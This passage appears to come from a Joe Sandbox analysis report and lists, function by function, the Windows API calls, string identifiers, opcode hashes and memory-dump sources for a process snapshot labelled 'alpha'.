                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 62dabe2a0076c41e4cfaefffb39558633863ca7b00f5d11299b76ce4802e7a71
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5a7fbd96af086de0923c1309ad8fc4e6cfad7d43a2c7bb2121baf2cde5799384
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62dabe2a0076c41e4cfaefffb39558633863ca7b00f5d11299b76ce4802e7a71
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5112A71D0620CEBCB10DFB8DA4869EB7F5FF48315F614865D502E72A0E7709B059B42
                                                                                                                                                                                                                                                                                                                                                      Function 00F04840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F0484A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: _get_osfhandle.MSVCRT ref: 00EEDDA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EFC050), ref: 00EEDDAD
                                                                                                                                                                                                                                                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F04879
                                                                                                                                                                                                                                                                                                                                                      • _getch.MSVCRT ref: 00F0487F
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F04897
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00EF87E5,00000000,?,00EE4A0A), ref: 00F048AD
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 491502236-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3f9a42cba9a6037466fb54137feaa9ecd59bd286b6aeb859f3ca41cbfd185711
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1bbd0c06d1db4ca670f537383bc44601d869d4da44bae13a696789a3d7610c33
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f9a42cba9a6037466fb54137feaa9ecd59bd286b6aeb859f3ca41cbfd185711
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5401D4B1504258FFEB24ABA19C0AB9E3BE5DF00730F108518F901961E1EB75AD50FB91
                                                                                                                                                                                                                                                                                                                                                      Function 00EE6488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE6513: memset.MSVCRT ref: 00EE6593
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00EE8E86,00EE8E5A,00000000), ref: 00EEDC98
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDC60: RtlFreeHeap.NTDLL ref: 00EEDC9F
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EFA097
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heapmemset$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1291122668-438819550
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 64cdc712eefb401f99166e378c9f916a35da1fdc37804efc1508dd465337e440
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0323f3bb41fe046acac77a20f3d9b901618854cbbd5c2035bbb3595564b9f5c4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64cdc712eefb401f99166e378c9f916a35da1fdc37804efc1508dd465337e440
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B10EB1E0020C9BDF24DFA4C881ABEBBB5EF58704F199069EA09BB251D731DD40CB91
                                                                                                                                                                                                                                                                                                                                                      Function 00F05948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F05997
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: iswspace.MSVCRT ref: 00EEAB8D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEAB7F: wcschr.MSVCRT ref: 00EEAB9E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Enumiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3493821229-3301834661
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e95cfa6545705d6e6b48856e4ed7b2c1da5e5af80b1d0a973e1ac50cc6adc6d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 44936b2c77931f7b0916b83dc21b6107a9dcf8271290aba9bdada7871910d20e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e95cfa6545705d6e6b48856e4ed7b2c1da5e5af80b1d0a973e1ac50cc6adc6d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9811D71F0061D9BDB249B24CC85BFB7379EFD4B10F2481A9E40AA71C1EAB09E41AF50
                                                                                                                                                                                                                                                                                                                                                      Function 00EECCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 0-1704545398
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 038f263e68467e8d363eb390d042db7512914a4505e4890691563e42ae89fbab
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e6328a7f15390d5b1acc25b323287b0f7c77d8e0263ca2ca18c51a5b50ed2e95
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 038f263e68467e8d363eb390d042db7512914a4505e4890691563e42ae89fbab
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53518C31A0018D46C734BF26DC067BA7AA2EB50348F356039D416B72A1EBB29C43DB91
                                                                                                                                                                                                                                                                                                                                                      Function 00F04DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                      • String ID: aApP
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 644763121-2547155087
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b78cd36367c1c95ead79a4b6ef7bfccd7c46efe42de23987ebda0e76fc380c4e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 031309f5da5025ca375af64ae8e164f895795af3b58fcda6d6f1fc1e8f97ceba
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b78cd36367c1c95ead79a4b6ef7bfccd7c46efe42de23987ebda0e76fc380c4e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F4125B5A0011687CF24DF29C88527FB3E5BF55321718043AEA06DB2C0EA34FD42F2A1
                                                                                                                                                                                                                                                                                                                                                      Function 00F057A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F057F8
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00F05886
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: EnumErrorLast
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1967352920-4275322459
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 18bc7ad712ad1310ce96d6a0aca8a5b2ba20627750a408b58ea921cc1fb98eb5
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fc47d6df9f735f6fa9af181f4bd4647d871758ea2ac422354a65c6215b1a03b6
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18bc7ad712ad1310ce96d6a0aca8a5b2ba20627750a408b58ea921cc1fb98eb5
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39412D71E0061D97CF34AB658C956BB73E5EB94B20F1445ADE80AA7281DAF04E41BE90
                                                                                                                                                                                                                                                                                                                                                      Function 00F0A759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0A79F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00F0A83C
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 00F0A8B5
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                      • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 3b53dcc7f63e7ba92021e7e90fee519ef53e71d9587f063f0555f630975cdd76
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9c300e9a3afef46c24ce9362db540f78ae318b3b4f99ca7a3b683712aa59070a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b53dcc7f63e7ba92021e7e90fee519ef53e71d9587f063f0555f630975cdd76
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B141B471E00219ABDF24DBA4DC95AFEB7F8EF08314F0440ADE605A7281E7749E85DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00EF2EAF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: iswdigit.MSVCRT ref: 00EF320A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF321B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF322E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF3252
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF31EA: wcschr.MSVCRT ref: 00EF3269
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EF2FA6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                      • String ID: <>+-*/%()|^&=,$-$-
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2770779731-3754639422
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 24bc45dda21969207974b0764cf00d17860cb1cddb5d56bb1570b20f9792acb7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 773c78ced76fd219ad08113e712425b4ab5921b1f33eccf1eb4600b6c481e819
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24bc45dda21969207974b0764cf00d17860cb1cddb5d56bb1570b20f9792acb7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40414572A0020DABCF11EE54D8419EF73B6AF55324F509129FF15BB240EB71AF458B90
                                                                                                                                                                                                                                                                                                                                                      Function 00F0378A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00F03835
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F03847
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ErrorLastOpenSemaphore
                                                                                                                                                                                                                                                                                                                                                      • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1909229842-1814513734
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 678226f9305e42af59a5660ba6d3b21e2adb531d6f6ebc9c6f87be1919c3425a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 39f9527670c192889ae1fcc40d2fd7a3998c6e19efb926ba1f09509bd59cf68c
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 678226f9305e42af59a5660ba6d3b21e2adb531d6f6ebc9c6f87be1919c3425a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F41D8B2E012298BCB25DF29C8596A977F9EF94310F1482D9E805D72D4DB708F45EB90
                                                                                                                                                                                                                                                                                                                                                      Function 00F0237E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 00F0239F
                                                                                                                                                                                                                                                                                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00F023CD
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3937467467-2303653343
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4d1a02577531f82fdf88d080dfe803270ee1da6f74e8a2fd9a50f8103bbba2c0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 02b2ae2564eafd270d4788b3ee05e54ebbe60a5eb1691fb47e823eb46d4cc63e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d1a02577531f82fdf88d080dfe803270ee1da6f74e8a2fd9a50f8103bbba2c0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E041E776A0022C9BCB21DF55DC8DEEAB7B5EF94710F1001C5E809A72C2DB709E45AFA0
                                                                                                                                                                                                                                                                                                                                                      Function 00F05679 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94registryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,00F0CD40,0000001C,00F06901), ref: 00F056A8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00F05778
